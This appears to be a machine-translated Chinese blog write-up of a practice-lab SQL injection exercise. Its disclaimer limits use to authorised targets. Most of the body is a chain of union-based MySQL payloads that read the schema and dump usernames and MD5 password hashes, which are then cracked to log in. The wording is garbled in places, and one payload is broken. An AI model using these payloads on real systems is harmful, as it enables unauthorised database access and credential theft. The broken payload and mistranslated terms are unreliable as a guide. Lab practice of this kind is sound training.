莫哲射击场SQL手动注入漏洞测试(MySQL数据库)通关思路

 2024-03-02 03:05:30  阅读 0

文章目录

前言

本文仅用于学习和反思巩固SQL注入知识,禁止用于非法攻击。 注意,靶场是练习平台,不能去未经授权的网站进行渗透测试! ! !

1、莫哲射击场开工

莫哲射击场是一个不用自己搭建就可以使用的射击场。 非常适合懒得搭建靶场但又想练习的新手玩家。 网址在这里:

点击打开射击场,然后点击进入

2. 靶场间隙思路 1. 确定注射点

不管输入什么,用户名和密码仍然是错误的,说明注入的地方可能不在这里。 鼠标右键查看源码,发现一个新的URL,就是get注入。 (如图所示

打开这个网址,成功找到注射处,正片开始。

注入语句

id=1 and 1=1

id=1 and 1=2

这里我们按照老规则抛出和1=1和和1=2测试,发现1=1页面正常,而报1=2错误,所以是数字注入。 (如图所示)

2.爆炸场数量

(如图)注入语句是id=1 order by 1,逐渐完善数字1,发现是5,报错。 描述字段数量为4

3.爆炸显示位置

(如图)注入语句为id=-1 union 1,2,3。 至于为什么这里的id变成-1,其实是为了防止数据库查询信息而返回错误,从而巧妙的返回我们的注入语句。

发现明显位置是2、3

4、爆出数据库名称、版本、用户等。

如图)注入语句为

id=-1 union select 1,user(),database(),4

获取用户为root,数据库名称为oup

5、爆出数据库表名

注入语句是

id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

所有表名都获取了,第一个明显可疑。 (如图所示)

6. 展开数据库列表

注入语句是

id=-1 union select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema=database() and table_name="StormGroup_member"

获取四个列名id,name,,(如图)

名字明显且可疑

7. 爆破数据库数据

注入语句是

id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

获取密码名称(如图)

我发现密码是一串MD5,去MD5解码网站

有两个密码,

发现密码账号登录失败,您可以使用密码账号登录,并成功获取密钥。

总结

这是基于get提交的数字注入。 这篇文章是小白自己写的,巩固sql注入。 如果您路过,请给我一些建议!

标签: 注入 所示 语句

如本站内容信息有侵犯到您的权益请联系我们删除,谢谢!!


Copyright © 2020 All Rights Reserved 京ICP5741267-1号 统计代码